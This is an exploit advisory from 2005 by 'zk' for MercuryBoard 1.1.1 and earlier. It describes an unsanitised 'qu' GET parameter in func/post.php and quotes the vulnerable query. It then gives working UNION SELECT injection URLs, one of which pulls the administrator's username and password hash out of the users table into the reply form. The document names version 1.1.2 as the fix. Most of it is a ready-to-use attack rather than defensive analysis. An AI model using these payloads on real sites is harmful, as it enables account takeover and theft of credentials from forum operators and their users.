Mercuryboard <= 1.1.1 Working Sql Injection
I made this just because the provided proof of concept by Andrea Trivero
didn't work.
Zk
{==============================================================================}
{ [ Zeelock-2005 ] }
{==============================================================================}
{ }
{ M E C U R Y B O A R D }
{ }
{ [ Critical SQL Injection - Working Exploit ] }
{ }
{ }
{==============================================================================}
Date: 7th February 2005
Version Vulnerable: <= 1.1.1
Version Fixed: 1.1.2
"Validate anything can be passed. Security lays in the inputs. " - zk
Description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MercuryBoard is a powerful message board system dedicated to raw speed with a
mixture of features, ease of use, and ease of customization coupled with
expandability, and diverse language services. Now just over two years in the
making, version 1.0.0 is an immensely stable, thoroughly tested, and well
written piece of internet software ready for any webserver, running on PHP
versions as low as 4.0.0 and MySQL versions as low as 3.22.
For More information:
http://www.mercuryboard.com/index.php?a=about
Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Andrea Trivero of Codebug Security (www.codebug.org) found a lot of security
flaws inside this code: many XSS and some Sql injection.
Anyway he did not provide a real working exploit.
Looking at the following piece of code in func/post.php we can see that when the
"qu" variable is passed along with the "reply" switch we can inject anything
inside the "t" parameter passed via GET from the browser because it is not
sanitized at all.
--------[ Mercury 1.1.1 original code ]--------------
if (($s == 'reply') && isset($this->get['qu'])) {
$query = $this->db->fetch("SELECT p.post_text, m.user_name FROM {
$this->pre}posts p, {$this->pre}users m WHERE p.post_id={
$this->get['qu']} AND p.post_author=m.user_id");
--------[/Mercury 1.1.1 original code ]--------------
Now we can try to inject something:
http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
%20SELECT%20null,null/*
The only thing we have to keep in mind is that "t" parameter should refer to a
"opic we have the permission to reply and the "qu" parameter should refer
to a non existing topic.
We get no errors so we can make something more.
Proof of concept
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20
=%201%20limit%201/*
The nice thing is that you should see the Admin Username and the Admin Pwd Hash
inside the reply form between the [quote] tags.
Note: During the installation you may have chosen a different prefix for the
tables. You need to modify the query in the right way to retrieve the
information from the database.